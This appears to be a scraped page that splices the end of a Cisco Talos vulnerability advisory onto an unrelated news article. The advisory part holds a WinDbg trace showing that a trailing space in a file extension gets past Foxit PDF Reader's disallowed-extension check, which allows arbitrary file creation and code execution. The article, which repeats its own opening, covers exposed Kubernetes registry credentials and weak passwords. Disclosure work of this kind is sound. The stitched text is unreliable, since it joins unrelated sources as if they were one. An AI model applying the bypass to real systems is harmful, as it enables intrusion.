    0:000> pc
    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb3c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4bb7 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad767:
    017e4bb7 e824746d00      call    FoxitPDFReader!safe_vsnprintf+0x52e880 (01ebbfe0)
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76c:
    017e4bbc 50              push    eax                                      ; <--------------------- [1]
    0:000> dd eax
    0b4764e8  0f8ddf50 0f8dd9b0 0f8ddf68 0f8dde60
    0b4764f8  0f8ddea8 0f8dd878 0f8ddad0 0f8dd9e0
    0b476508  0f8dd998 0f8dd9f8 0f8dd860 0f8dda10
    0b476518  0f8dda70 0f8dd8d8 0f8dd9c8 0f8dda28
    0b476528  0f8dda58 0f8dd968 0f8dd908 0f8dd830
    0b476538  0f8dd650 0f8dd938 0f8dda40 0f8dd890
    0b476548  0f8dd8f0 0f8dd8a8 0f8dd920 0f8dd698
    0b476558  0f8dd8c0 0f8dd980 0f8dd848 0f8dd950
    0:000> du 0f8ddf50+c                                             
    0f8ddf5c  "acm"
    0:000> du 0f8dd9b0+c
    0f8dd9bc  "ade"
    0:000> du 0f8ddf68+c
    0f8ddf74  "adp"
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbd esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76d:
    017e4bbd 8d8d5cfeffff    lea     ecx,[ebp-1A4h]
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb60 edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bc3 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad773:
    017e4bc3 e8382f6d00      call    FoxitPDFReader!safe_vsnprintf+0x52a3a0 (01eb7b00) ; <--------------------- [2]
    0:000> dd ecx                                            
    073fdb60  0f8dde18 0fe92208 04a13aec 04a13af4
    073fdb70  04a13afc 04a13b04 04a13b0c 04a13b14
    073fdb80  04a13b1c 04a13b28 04a13b30 04a13b38
    073fdb90  04a13b40 04a13b48 04a13b50 04a13b58
    073fdba0  04a13b60 04a13b68 04a13b70 04a13b78
    073fdbb0  04a13b80 04a13b88 04a13b90 04a13b98
    073fdbc0  049918bc 04a13ba0 04a13ba8 049d1d20
    073fdbd0  04a13bb0 04a13bb8 04a13bc0 04a13bc8
    0:000> du 0f8dde18+c                                        ; <--------------------- [3]
    0f8dde24  "acm "                                          
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bc8 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad778:
    017e4bc8 85c0            test    eax,eax                  ; <--------------------- [4]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bca esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77a:
    017e4bca 745a            je      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad7d6 (017e4c26) [br=0]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bcc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77c:
    017e4bcc 46              inc     esi
    0:000> g
    Breakpoint 6 hit
    eax=0b46e80c ebx=0e70e6e8 ecx=1f2842b4 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3014 esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbc4:
    017e3014 8d8dc4d7ffff    lea     ecx,[ebp-283Ch]
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301a esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbca:
    017e301a 51              push    ecx
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301b esp=073fb700 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbcb:
    017e301b 6801100000      push    1001h
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3020 esp=073fb6fc ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd0:
    017e3020 50              push    eax
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3021 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd1:
    017e3021 8d8dd8d7ffff    lea     ecx,[ebp-2828h]
    0:000> du eax                                                              ; <--------------------- [5]
    0b46e80c  "C:\Users\dev\AppData\Local\Temp\"
    0b46e84c  "$frd_\F9R4B52.tmp\exploit.acm "
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb728 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3027 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd7:
    017e3027 e8f2b38302      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1dcaee (0401e41e)  ; <--------------------- [6]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=1817f444 edx=00000006 esi=073fdfb8 edi=00000000
    eip=017e302c esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbdc:
    017e302c 85c0            test    eax,eax                              ; <--------------------- [7]
    

At [1], the argument of the method at [2] is pushed onto the stack. The value being pushed comes from the register eax, which contains the disallowed file extensions. At [3], the this object of the method contains the extension of the given filename, which is the string “acm “. The method called at [2] performs the string comparison, which fails as the string “acm “ is not present in the disallowed list. The comparison results can be observed at [4]. Later on, the filename was passed to CFile::Open at [6], which created the file successfully. The non-zero value at [7] indicates that the open was successful.

This vulnerability allows the creation of arbitrary files, and the execution of these files leads to arbitrary code execution.

**TIMELINE**

2023-08-28 - Vendor Disclosure  
2023-11-22 - Vendor Patch Release  
2023-11-27 - Public Release

Discovered by Kamlapati Choubey of Cisco Talos.

CVE-2023-40194: TALOS-2023-1833 || Cisco Talos Intelligence Group

Cybersecurity researchers are warning of publicly exposed Kubernetes configuration secrets that could put organizations at risk of supply chain attacks.
“These encoded Kubernetes configuration secrets were uploaded to public repositories,” Aqua security researchers Yakir Kadkoda and Assaf Morag said in a new research published earlier this week.
Some of those impacted include two top blockchain

Cloud security / Data Protection

Cybersecurity researchers are warning of publicly exposed Kubernetes configuration secrets that could put organizations at risk of supply chain attacks.

"These encoded Kubernetes configuration secrets were uploaded to public repositories," Aqua security researchers Yakir Kadkoda and Assaf Morag said in a new research published earlier this week.

Some of those impacted include two top blockchain companies and various other fortune-500 companies, according to the cloud security firm, which leveraged the GitHub API to fetch all entries containing .dockerconfigjson and .dockercfg, which store credentials for accessing a container image registry.

Of the 438 records that potentially held valid credentials for registries, 203 records – about 46% – contained valid credentials that provided access to the respective registries. Ninety-three of the passwords were manually set by individuals, as opposed to the 345 that were computer-generated.

"In the majority of cases, these credentials allowed for both pulling and pushing privileges," the researchers noted. "Moreover, we often discovered private container images within most of these registries."

Furthermore, nearly 50% of the 93 passwords were deemed weak. This comprised password, test123456, windows12, ChangeMe, and dockerhub, among others.

"This underscores the critical need for organizational password policies that enforce strict password creation rules to prevent the use of such vulnerable passwords," the researchers added.

Aqua said it also found instances where organizations fail to remove secrets from the files that are committed to public repositories on GitHub, leading to inadvertent exposure.

But on a positive note, all the credentials associated with AWS and Google Container Registry (GCR) were found to be temporary and expired, making access impossible. In a similar vein, the GitHub Container Registry required two-factor authentication (2FA) as an added layer against unauthorized access.

"In some cases, the keys were encrypted and thus there was nothing to do with the key," the researchers said. "In some cases, while the key was valid it had minimal privileges, often just to pull or download a specific artifact or image."

According to Red Hat's State of Kubernetes Security Report released earlier this year, vulnerabilities and misconfigurations emerged as top security concerns with container environments, with 37% of the total 600 respondents identifying revenue/customer loss as a result of a container and Kubernetes security incident.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#aws